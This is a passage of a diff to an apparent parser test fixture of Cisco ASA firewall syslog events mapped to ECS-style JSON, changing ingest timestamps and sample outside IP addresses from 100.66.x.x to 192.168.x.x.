"2021-09-07T12:21:32.722117600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306", + "ingested": "2021-12-09T13:34:28.100338900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -15909,8 +15909,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15945,7 +15945,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15954,8 +15954,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722121900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", + "ingested": "2021-12-09T13:34:28.100344500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11837", "source_interface": "outside", "mapped_destination_port": 1302 @@ -16009,8 +16009,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722126Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100350100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16056,8 +16056,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722130Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100372600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16103,8 +16103,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722134300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100378600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16150,8 +16150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722139Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100384500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16197,8 +16197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722143300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100393200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16244,8 +16244,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722147600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100399200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16291,8 +16291,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722162600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100405200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16338,8 +16338,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722171100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100411100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16385,8 +16385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722176500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100417Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16432,8 +16432,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722181600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100422900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16479,8 +16479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722186100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100428800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16526,8 +16526,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722191200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100433400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16573,8 +16573,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722196300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100437Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16620,8 +16620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722200700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100441600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16667,8 +16667,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722205100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100447Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16693,8 +16693,8 @@ }, "destination": { "port": 8308, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1304, @@ -16734,7 +16734,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -16742,8 +16742,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722209500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308", + "ingested": "2021-12-09T13:34:28.100452Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -16776,8 +16776,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -16812,7 +16812,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -16821,8 +16821,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722213800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", + "ingested": "2021-12-09T13:34:28.100457900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -16838,7 +16838,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11840", "source_interface": "outside", "mapped_destination_port": 1304 
@@ -16876,8 +16876,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722218700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100462300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16923,8 +16923,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722223100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100466700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16954,8 +16954,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -16990,7 +16990,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, 
@@ -16999,8 +16999,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722227500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100471300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17016,7 +17016,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.0.124", + "mapped_source_ip": "192.168.0.124", "connection_id": "11841", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17038,8 +17038,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17074,7 +17074,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17083,8 +17083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722231900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100477100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -17100,7 +17100,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.160.2", + "mapped_source_ip": "192.168.160.2", "connection_id": "11842", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17122,8 +17122,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -17158,7 +17158,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -17168,8 +17168,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.722240800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", + "ingested": "2021-12-09T13:34:28.100483Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17206,8 +17206,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17242,7 +17242,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, 
@@ -17252,8 +17252,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.722245400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.100488800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17285,8 +17285,8 @@ }, "destination": { "port": 8309, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1305, @@ -17326,7 +17326,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -17334,8 +17334,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722249800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309", + "ingested": "2021-12-09T13:34:28.100530100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -17368,8 +17368,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17404,7 +17404,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -17413,8 +17413,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722254Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", + "ingested": "2021-12-09T13:34:28.100534300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -17430,7 +17430,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11843", "source_interface": "outside", "mapped_destination_port": 1305 @@ -17468,8 +17468,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722259900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100538600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -17515,8 +17515,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722264500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100542200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17562,8 +17562,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722268800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100546100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17609,8 +17609,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722272800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100551Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -17656,8 +17656,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722276900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100557200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17703,8 +17703,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722280800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100563200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17750,8 +17750,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722285100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100569100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17781,8 +17781,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" 
@@ -17817,7 +17817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17828,8 +17828,8 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.722290Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.100574900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:52.000Z", @@ -17866,8 +17866,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17901,7 +17901,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17910,8 +17910,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722293900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100580800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -17947,8 +17947,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17982,7 +17982,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -17991,8 +17991,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722297800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100586700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18028,8 +18028,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18063,7 +18063,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18072,8 +18072,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722301700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100592500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18104,8 +18104,8 @@ }, "destination": { "port": 8310, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1306, @@ -18145,7 +18145,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -18153,8 +18153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722305500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310", + "ingested": "2021-12-09T13:34:28.100598400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -18187,8 +18187,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18223,7 +18223,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18232,8 +18232,8 @@ }, "event": { "severity": 6, - "ingested": 